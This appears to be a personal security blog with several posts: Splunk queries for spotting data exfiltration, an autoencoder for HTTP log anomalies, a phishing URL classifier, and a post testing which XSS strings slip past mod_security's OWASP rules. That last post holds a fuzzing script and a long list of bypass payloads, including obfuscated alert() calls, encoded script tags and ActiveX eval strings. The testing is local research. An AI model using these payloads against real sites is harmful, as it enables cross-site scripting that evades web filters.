Index

2/19/2019: Splunk Queries for Identifying Data Exfiltration

1/1/2019: AI: Autoencoder for HTTP Log Anomaly Detection

12/2/2018: AI: Deep Learning for Phishing URL Detection

9/1/2018: Mod_security Bypass for XSS

8/11/2018: AI: FOMC Monetary Policy Analysis v2

7/31/2018: AI: FOMC Monetary Policy Analysis v1

Splunk Queries for Identifying Data Exfiltration

I've been working with Splunk at my job and wanted to provide some interesting queries that might assist with network data analytics for cyber security purposes. These queries are specifically targeted to identify behaviors that could be viewed as data exfiltration. The queries below can be modified for any time frame, but I've been running them with data from the last 30 days. These are massive searches and with current limits on my allotted hard disk space, I'm thinking about lowering the time frame to two or three weeks. You can also use the "table" search command to specify what you'd like to see as output. For each query, I have included what I like to see for output.

Users with a Large Increase in Web Traffic Moving out of the Network. The query below will output the user, the time, the source IP, the aggregated bytes sent out, the number of data samples, the number of standard deviations away from the source's average bytes sent per day, and the number of standard deviations away from the organization's average bytes sent per day. It will show output when the bytes out is 3 standard deviations above the source's or organization's average for the latest day compared with the latest 30 days.

((tag=network tag=communicate) OR (index=pan_logs sourcetype=pan*traffic) OR (index=* sourcetype=opsec) OR (index=* sourcetype=cisco:asa) ) (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) AND action=allowed AND (dest_port=80 OR dest_port=443) NOT (dest_ip=10.0.0.0/8 OR dest_ip=172.16.0.0/12 OR dest_ip=192.168.0.0/16)
| bucket _time span=1d
| stats sum(bytes*) as bytes* by user _time src_ip
| eventstats max(_time) as maxtime avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(maxtime, "@h"),bytes_out,null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(maxtime, "@h"),bytes_out,null))) as per_source_stdev_bytes_out by src_ip  
| where num_data_samples >=4 AND bytes_out > avg_bytes_out + 3 * stdev_bytes_out AND bytes_out > per_source_avg_bytes_out + 3 * per_source_stdev_bytes_out AND _time >= relative_time(maxtime, "@h")
| eval num_standard_deviations_away_from_org_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out,2), num_standard_deviations_away_from_per_source_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out,2)
| fields - maxtime per_source* avg* stdev*

Users with a Sudden Increase in Sending Many DNS Requests. The query below will output the user, the time, the source IP, the destination IP, the number of DNS requests, the number of data samples, the number of standard deviations away from the source's average of DNS requests per day, and the number of standard deviations away from the organization's average of DNS requests per day. It will show output when the number of DNS requests are 3 standard deviations above the source's or organization's average for the latest day compared with the latest 30 days.

index=* dest_port=53
| bucket _time span=1d
| stats count by user _time src_ip dest_ip
| eventstats max(_time) as maxtime avg(count) as avg_count stdev(count) as stdev_count | eventstats count as num_data_samples avg(eval(if(_time < relative_time(maxtime, "@h"),count,null))) as per_source_avg_count stdev(eval(if(_time < relative_time(maxtime, "@h"),count,null))) as per_source_stdev_count by src_ip  
| where num_data_samples >=4 AND count > avg_count + 3 * stdev_count AND count > per_source_avg_count + 3 * per_source_stdev_count AND _time >= relative_time(maxtime, "@h")
| eval num_standard_deviations_away_from_org_average = round(abs(count - avg_count) / stdev_count,2), num_standard_deviations_away_from_per_source_average = round(abs(count - per_source_avg_count) / per_source_stdev_count,2)
| fields - maxtime per_source* avg* stdev*

Users with a Sudden Increase in Non-Corporate Emails Sent. The query below will output the email sender, the count of emails sent within the last day, the per day average emails sent over the last 30 days, and the lower and upper bounds of 3 standard deviations from the average emails count. The results will populate when the count is outside of the 3 standard deviations from the average.

(index=* sourcetype=cisco:esa* OR sourcetype=MSExchange*:MessageTracking OR tag=email) cef_signature=Message (from=*include_part_of_email_domain_here*) AND (from!=*Brocade* OR from!=*Storage_Alerts*) NOT (to=*include_part_of_email_domain_here*)
| bucket _time span=1d
| stats count by from, _time
| eval maxtime=now() | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@h"), 'count',null))) as "count" avg(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as avg stdev(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as stdev by "from"
| eval lowerBound=(avg-stdev*6), upperBound=(avg+stdev*6)
| eval isOutlier=if(('count' < lowerBound OR 'count' > upperBound) AND num_data_samples >=7, 1, 0) | where isOutlier=1 AND count>10 AND count>upperBound | table from, num_data_samples, count, avg, stdev, upperBound

Users Suddenly Sending Excessive Email. The query below will output the email sender, the count of emails sent within the last day, the per day average emails sent over the last 30 days, and the lower and upper bounds of 3 standard deviations from the average emails count. The results will populate when the count is outside of the 3 standard deviations from the average.

(index=* sourcetype=cisco:esa* OR sourcetype=MSExchange*:MessageTracking OR tag=email) cef_signature=Message (from=*
include_part_of_email_domain_here* ) | bucket _time span=1d
| stats count by from, _time
| eval maxtime=now() | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@h"), 'count',null))) as "count" avg(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as avg stdev(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as stdev by "from"
| eval lowerBound=(avg-stdev*6), upperBound=(avg+stdev*6)
| eval isOutlier=if(('count' < lowerBound OR 'count' > upperBound) AND num_data_samples >=7, 1, 0) | where isOutlier=1 AND count>10 AND count>upperBound | table from, num_data_samples, count, avg, stdev, upperBound

AI: Autoencoder for HTTP Log Anomaly Detection

For this particular project, I wanted to focus on anomaly detection in the domain of cyber security. I figured that analysis of web logs for anomalies would be a great start to this experiment. After doing some research, it seems that unsupervised deep learning would be a great way to implement this type of analysis. An autoencoder neural network is a very popular way to detect anomalies in data. The autoencoder tries to learn to approximate the identity function:

Identity function

Here is what a typical autoencoder model might look like:

Autoencoder model

For detailed information on these models, there are plenty of blogs, research, etc. for the curious mind.

As I needed comprehensive data, I looked for a database of web logs that could be easily ran through my autoencoder model. I found a dataset at Kaggle: https://www.kaggle.com/shawon10/web-log-dataset#webLog.csv . This dataset is a 10787 X 4 vector/tensor. The 4 columns represent the IP address, the time, the directory requested, and the HTTP Response code. I removed the time column from my data because every one of these entries would be unique and might not help elicitate a pattern within the data that will help with anomaly detection. Here are some charts from the output of the model:

Statistics on the Reconstruction Errors: Reconstruction error statistics

Binning of the Reconstruction Errors: Reconstruction error binning

Plotting of the Reconstruction Errors vs. the data: Reconstruction error vs. data

The first bubble in the upper left part of the latest chart is a non-patterned data point that I purposely included to verify the model is working correctly. As you can see, it does indeed stand out. I created a pipeline to extract all original data entries that are above the 99th quartile of mean squared error (reconstruction error) from the data. This is the threshold that I used to automatically detect anomalies. Samples of the data above the threshold value can be seen below; all of the data points above the threshold are available on Github as a separate text file. You can verify yourself that these directories are unique in the original dataset. It is incredible that this AI was able to figure out what values are anomalies based on some hyperparameters and the training of the model with this data.

200
GET /madeup.php HTTP/1.1
10.4.5.2
----------------------------------
GET /profile.php?user=bala HTTP/1.1
10.130.2.1
200
----------------------------------
GET /edit.php?name=bala HTTP/1.1
10.131.2.1
200
----------------------------------
10.131.2.1
200
GET /contestproblem.php?name=Toph%20Contest%202 HTTP/1.1
----------------------------------
10.131.2.1
GET /details.php?id=3 HTTP/1.1
200
----------------------------------
10.131.2.1
200
GET /contestsubmission.php?id=4 HTTP/1.1
----------------------------------
10.131.2.1
200
GET /edit.php?name=ksrsingh HTTP/1.1
----------------------------------
200
GET /showcode.php?id=285&nm=ksrsingh HTTP/1.1
10.131.0.1
----------------------------------
GET /allsubmission.php?name=shawon HTTP/1.1
200
10.128.2.1
----------------------------------

If there are issues with accessing my Gihub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for code, model, and the dataset related to this project.

I've also included my output from Keras below:

Found 271 unique tokens.
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
input_4 (InputLayer)         (None, 3)                 0
_________________________________________________________________
dense_13 (Dense)             (None, 2)                 8
_________________________________________________________________
dense_14 (Dense)             (None, 1)                 3
_________________________________________________________________
dense_15 (Dense)             (None, 2)                 4
_________________________________________________________________
dense_16 (Dense)             (None, 3)                 9
=================================================================
Total params: 24
Trainable params: 24
Non-trainable params: 0
_________________________________________________________________
Train on 8630 samples, validate on 2157 samples
Epoch 1/50
8630/8630 [==============================] - 1s 77us/step - loss: 544.2785 - acc: 0.3645 - val_loss: 250.2417 - val_acc: 0.0000e+00
Epoch 2/50
8630/8630 [==============================] - 1s 58us/step - loss: 542.9074 - acc: 0.8287 - val_loss: 249.4843 - val_acc: 0.0000e+00
Epoch 3/50
8630/8630 [==============================] - 0s 56us/step - loss: 541.6439 - acc: 0.1955 - val_loss: 248.8086 - val_acc: 0.0000e+00
Epoch 4/50
8630/8630 [==============================] - 0s 56us/step - loss: 540.5283 - acc: 0.5802 - val_loss: 248.2224 - val_acc: 0.0000e+00
Epoch 5/50
8630/8630 [==============================] - 0s 57us/step - loss: 539.5738 - acc: 0.9196 - val_loss: 247.7275 - val_acc: 0.9986
Epoch 6/50
8630/8630 [==============================] - 0s 58us/step - loss: 538.7705 - acc: 0.9461 - val_loss: 247.3153 - val_acc: 0.9986
Epoch 7/50
8630/8630 [==============================] - 0s 56us/step - loss: 538.1015 - acc: 0.9461 - val_loss: 246.9732 - val_acc: 0.9986
Epoch 8/50
8630/8630 [==============================] - 0s 57us/step - loss: 537.5472 - acc: 0.9461 - val_loss: 246.6904 - val_acc: 0.9986
Epoch 9/50
8630/8630 [==============================] - 0s 57us/step - loss: 537.0872 - acc: 0.9461 - val_loss: 246.4559 - val_acc: 0.9986
.................................................................
Epoch 45/50
8630/8630 [==============================] - 0s 57us/step - loss: 534.4239 - acc: 0.9461 - val_loss: 245.0778 - val_acc: 0.9986
Epoch 46/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4204 - acc: 0.9461 - val_loss: 245.0758 - val_acc: 0.9986
Epoch 47/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4172 - acc: 0.9461 - val_loss: 245.0742 - val_acc: 0.9986
Epoch 48/50
8630/8630 [==============================] - 0s 57us/step - loss: 534.4143 - acc: 0.9461 - val_loss: 245.0727 - val_acc: 0.9986
Epoch 49/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4117 - acc: 0.9461 - val_loss: 245.0713 - val_acc: 0.9986
Epoch 50/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4094 - acc: 0.9461 - val_loss: 245.0701 - val_acc: 0.9986

AI: Deep Learning for Phishing URL Detection

I wanted to continue building my A.I. / deep learning knowledge. A requirement for this project was that it had to be focused on cyber security. I know that email-based phishing is a big issue within our society and I wanted to focus my efforts in that particular direction. I have somewhat of a specialization in applying deep learning to NLP (natural language processing).This is simply an observation of my interests and resulting output.

I decided to use binary classification for this particular model; thus I had to find phishing URLs.

For the phishing URLs, I used Phishtank's verified URL database. I have coded logic that polls their API every 4 hours and continues to build a local database. For my non-phishing URLs, I have a crawler I found on Github and modified for my own purposes to update a local database.

I set about with a character-embedded Bidirectional LSTM for training. This seems to be a production worthy state-of-the art model that benefits from seeing past characters as well as characters later in the URL. This helps to identify features that can be used for detecting patterns for binary classification. At the end of this post I have the Keras training output.

Below are charts of the training/cross-validation loss and accuracy:

Training/val loss Training/val acc

The model achieved a 97.68% level of accuracy on the test set (representing 10% of the URLs i.e. 6799 URLs). I have also included evaluation metrics below for this model: ROC/AUC curve, confusion matrices, and the F1 score.

ROC/AUC Curve:

ROC/AUC Curve ROC/AUC Curve Zoomed

Confusion matrices:

Confusion Matrix non-normatlized Confusion Matrix normalized

F1 Score:

F1 Score

For various directories and files, I seem to get a respectable level of accuracy with unseen data. However, various tests seem to show unreliable predictions when it comes to base URLs. I have code that simply returns no prediction on base URLs e.g. https://www.zpettry.com

I have put together a Flask REST API that can be tested locally. I also have a "request.py" program available that will do the POST request for you. All you have to do is add the URL of your choice.

Future Plans:

I have coded logic that continuously acquires both phishing and regular URLs as I'm think about turning this model into more of an anomaly detection paradigm by using an Autoencoder. There are a plethora of regular URLs that could be trained on as the data is incredibly asymmetric. Furthermore, I might start looking into the body of emails and start training an anomaly detection model to detect if the message is classified as phishing. This way I can create an ensemble model. Based on my research, it seems that these models outperform non-ensemble methods.

If there are issues with accessing my Gihub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for code and datasets related to this project.

Because of Github size limits, the model can be downloaded here: Model

This is the training output from Keras:

Using TensorFlow backend.
Found 69 unique tokens.
Shape of data tensor: (67997, 128)
Shape of label tensor: (67997,)
_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
embedding_4 (Embedding)      (None, 128, 128)          8960      
_________________________________________________________________
bidirectional_10 (Bidirectio (None, 128, 512)          788480    
_________________________________________________________________
bidirectional_11 (Bidirectio (None, 128, 512)          1574912   
_________________________________________________________________
bidirectional_12 (Bidirectio (None, 256)               656384    
_________________________________________________________________
dense_4 (Dense)              (None, 1)                 257       
=================================================================
Total params: 3,028,993
Trainable params: 3,028,993
Non-trainable params: 0
_________________________________________________________________
Train on 48957 samples, validate on 12240 samples
Epoch 1/10
48957/48957 [==============================] - 1082s 22ms/step - loss: 0.4997 - acc: 0.7468 - val_loss: 0.3786 - val_acc: 0.8386
Epoch 2/10
48957/48957 [==============================] - 1078s 22ms/step - loss: 0.3326 - acc: 0.8631 - val_loss: 0.2266 - val_acc: 0.9182
Epoch 3/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.2686 - acc: 0.8942 - val_loss: 0.1943 - val_acc: 0.9252
Epoch 4/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1852 - acc: 0.9326 - val_loss: 0.1308 - val_acc: 0.9551
Epoch 5/10
48957/48957 [==============================] - 1080s 22ms/step - loss: 0.1664 - acc: 0.9400 - val_loss: 0.1272 - val_acc: 0.9574
Epoch 6/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1274 - acc: 0.9561 - val_loss: 0.0995 - val_acc: 0.9683
Epoch 7/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1006 - acc: 0.9661 - val_loss: 0.0844 - val_acc: 0.9742
Epoch 8/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.0894 - acc: 0.9702 - val_loss: 0.0674 - val_acc: 0.9772
Epoch 9/10
48957/48957 [==============================] - 1078s 22ms/step - loss: 0.0839 - acc: 0.9732 - val_loss: 0.0658 - val_acc: 0.9800
Epoch 10/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.0717 - acc: 0.9769 - val_loss: 0.0582 - val_acc: 0.9825
6799/6799 [==============================] - 46s 7ms/step
Model Accuracy: 98.29%

Mod_security Bypass for XSS

I wanted to do some research in the cybersecurity domain that piqued my interest. I decided to test what XSS strings in the FuzzDB and SecLists lists bypassed mod_security OWASP ruleset on a standard Apache2 web server. I used the code represented below:

#!/usr/bin/env python
"""
Test for mod_security bypass.
"""
# Standard Python libraries.
import requests

with open('/root/projects/fuzzdb.txt') as f:
    content = f.read().splitlines()

dict = {}
for x in content:
    url = 'http://127.0.0.1/login2.php'
    url = url
    payload = {'username': x, 'password': '1'}
    r = requests.post(url, data=payload)
    dict[x] = r.status_code

for k,v in dict.items():
    if v == 200:
        print(k)
        print('----------------------------------------------')

I combined all separate XSS lists within FuzzDB as well as SecLists. I then proceeded to run these on the login parameter of a quick PHP login script I acquired for testing. As you can see from the preceding Python code, I would print out the string that received a 200 response code from the Apache2 server. This shows that the string is not being filtered by the WAF and thus not receiving a 403 Forbidden response from the server.

If there are issues with accessing my Gihub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for all code related to this project.

These are the XSS strings that were allowed to pass though the mod_security WAF:

'
----------------------------------------------
"
----------------------------------------------
&#x61;l&#x65;rt&#40;1)
----------------------------------------------
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
----------------------------------------------
&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
----------------------------------------------
'); alert('XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert(1)
----------------------------------------------
alert\\`1\\`
----------------------------------------------
alert`1`
----------------------------------------------
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
----------------------------------------------
//%0D%0A%0D%0A//
----------------------------------------------
setTimeout(location.search.slice(1));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
<br><br><br><br><br><br><br><br><br><br>
----------------------------------------------
<br><br><br><br><br><br><x id=x>#x
----------------------------------------------
alert`1`
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert&#x28;1&#x29
----------------------------------------------
alert&#40;1&#41
----------------------------------------------
(alert)(1)
----------------------------------------------
a=alert,a(1)
----------------------------------------------
[1].find(alert)
----------------------------------------------
top["al"+"ert"](1)
----------------------------------------------
top[/al/.source+/ert/.source](1)
----------------------------------------------
al\u0065rt(1)
----------------------------------------------
top['al\145rt'](1)
----------------------------------------------
top['al\x65rt'](1)
----------------------------------------------
top[8680439..toString(30)](1)
----------------------------------------------
navigator.vibrate(500)
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors()
----------------------------------------------
<head>
----------------------------------------------
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
----------------------------------------------
</head>
----------------------------------------------
<body>Hello</body>
----------------------------------------------
 onerror CDATA "alert(67)"
----------------------------------------------
 onload CDATA "alert(2)">
----------------------------------------------
<div id="91">[A]
----------------------------------------------
[B]
----------------------------------------------
[C]
----------------------------------------------
[D]
----------------------------------------------
<feImage>
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
----------------------------------------------
</feImage>
----------------------------------------------
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
----------------------------------------------
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
----------------------------------------------
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
----------------------------------------------
<div id="113"><div id="x">XXX</div>
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
<div id="116"><div id="x">x</div>
----------------------------------------------
<xml:namespace prefix="t">
----------------------------------------------
<div id="117"><a href="http://attacker.org">
----------------------------------------------
    <h1>Drop me</h1>
----------------------------------------------
</div>
----------------------------------------------
function makePopups(){
----------------------------------------------
    for (i=1;i<6;i++) {
----------------------------------------------
        window.open('popup.html','spam'+i,'width=50,height=50');
----------------------------------------------
    }
----------------------------------------------
}
----------------------------------------------
<body>
----------------------------------------------
</body>
----------------------------------------------
<div id="123"><span class=foo>Some text</span>
----------------------------------------------
<a class=bar href="http://www.example.org">www.example.org</a>
----------------------------------------------
alert('foo');
----------------------------------------------
});
----------------------------------------------
alert('bar');
----------------------------------------------
<!ATTLIST xsl:stylesheet
----------------------------------------------
  id    ID    #REQUIRED>]>
----------------------------------------------
        </xsl:template>
----------------------------------------------
    <circle fill="red" r="40"></circle>
----------------------------------------------
Same effect with
----------------------------------------------
<math>
----------------------------------------------
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
----------------------------------------------
<br/><hr/>
----------------------------------------------
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
----------------------------------------------
<br>
----------------------------------------------
<input name="secret" type="password">
----------------------------------------------
</image>
----------------------------------------------
<div id="134"><xmp>
----------------------------------------------
<%
----------------------------------------------
</xmp>
----------------------------------------------
x='<%'
----------------------------------------------
alert(2)
----------------------------------------------
XXX
----------------------------------------------
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
----------------------------------------------
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
----------------------------------------------
</template>
----------------------------------------------
<input name="username" value="admin" />
----------------------------------------------
<input name="password" type="password" value="secret" />
----------------------------------------------
<input name="injected" value="injected" dirname="password" />
----------------------------------------------
<input type="submit">
----------------------------------------------
<circle r="400"></circle>
----------------------------------------------